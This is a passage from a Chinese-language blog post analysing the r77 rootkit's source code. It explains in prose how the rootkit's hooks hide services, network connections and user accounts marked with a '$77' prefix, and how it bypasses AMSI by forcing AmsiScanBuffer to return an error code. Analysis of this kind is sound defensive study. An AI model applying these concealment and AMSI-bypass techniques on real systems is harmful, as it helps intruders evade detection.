<p>只要命中以下条件之一，就把服务条目从数组中删掉：</p>
<ul>
<li>名称带 <code>$77</code> 前缀</li>
<li>显示名带 <code>$77</code> 前缀</li>
<li>名称命中 <code>HiddenServiceNames</code></li>
<li>显示名命中 <code>HiddenServiceNames</code></li>
</ul>
<h4 id="网络连接隐藏"><a href="#网络连接隐藏" class="headerlink" title="网络连接隐藏"></a>网络连接隐藏</h4><p>这由 <code>HookedNtDeviceIoControlFile</code>实现。</p>
<p>当以下条件同时满足时才进入过滤逻辑：</p>
<ul>
<li><code>ioControlCode == IOCTL_NSI_GETALLPARAM</code></li>
<li>目标设备对象名是 <code>\Device\Nsi</code></li>
</ul>
<h5 id="实现方式-1"><a href="#实现方式-1" class="headerlink" title="实现方式"></a>实现方式</h5><p>满足条件后，Hook 会把输出缓冲区解释成 <code>NT_NSI_PARAM</code>，然后遍历：</p>
<ul>
<li>TCP 条目表</li>
<li>UDP 条目表</li>
<li>可选的进程条目表</li>
<li>可选的状态条目表</li>
</ul>
<p>过滤条件包括：</p>
<ul>
<li>TCP 本地端口命中 <code>HiddenTcpLocalPorts</code></li>
<li>TCP 远端端口命中 <code>HiddenTcpRemotePorts</code></li>
<li>UDP 端口命中 <code>HiddenUdpPorts</code></li>
<li>对应 PID 属于隐藏进程</li>
<li>对应进程名属于隐藏进程名</li>
<li>对应进程名带 <code>$77</code></li>
</ul>
<p>命中后，不只是删主表项，还会同步移动：</p>
<ul>
<li>entries 表</li>
<li>status 表</li>
<li>process 表</li>
</ul>
<p>并递减 <code>Count</code>。</p>
<h4 id="用户账户隐藏"><a href="#用户账户隐藏" class="headerlink" title="用户账户隐藏"></a>用户账户隐藏</h4><p>这由 <code>HookedSamEnumerateUsersInDomain</code>和 <code>HookedSamQueryDisplayInformation</code>实现。</p>
<p>其目标是让域用户&#x2F;本地用户枚举结果里看不到特定账户。</p>
<p>按如下条件判断是否隐藏：</p>
<ul>
<li>用户名带 <code>$77</code></li>
<li>用户名命中 <code>HiddenUserNames</code></li>
</ul>
<h4 id="AMSI-绕过"><a href="#AMSI-绕过" class="headerlink" title="AMSI 绕过"></a>AMSI 绕过</h4><p>这由 <code>HookedAmsiScanBuffer</code> 实现，直接返回固定错误码 <code>0x80070057</code></p>
<p>这和安装阶段 PowerShell 里直接 patch <code>AmsiScanBuffer</code> 的思想一致。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/categories/">Category</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/friends/">friends</a></li>
        
      </ul>
    </div>

    
    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#r77rootkit"><span class="toc-number">1.</span> <span class="toc-text">r77rootkit</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%95%B4%E4%BD%93%E6%B5%81%E7%A8%8B"><span class="toc-number">1.1.</span> <span class="toc-text">整体流程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%84%E6%A8%A1%E5%9D%97%E5%AE%9E%E7%8E%B0"><span class="toc-number">1.2.</span> <span class="toc-text">各模块实现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#installer"><span class="toc-number">1.2.1.</span> <span class="toc-text">installer</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#stager"><span class="toc-number">1.2.2.</span> <span class="toc-text">stager</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#service"><span class="toc-number">1.2.3.</span> <span class="toc-text">service</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#rootkit"><span class="toc-number">1.2.4.</span> <span class="toc-text">rootkit</span></a></li></ol></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&text=r77-rootkit源码分析"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&title=r77-rootkit源码分析"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&is_video=false&description=r77-rootkit源码分析"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=r77-rootkit源码分析&body=Check out this article: https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&title=r77-rootkit源码分析"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&title=r77-rootkit源码分析"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&title=r77-rootkit源码分析"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&title=r77-rootkit源码分析"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&name=r77-rootkit源码分析&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://exploo0osion.github.io/2026/03/26/2026-03-26-r77rootkit/&t=r77-rootkit源码分析"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2025-2026
    Exploooosion
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/friends/">friends</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
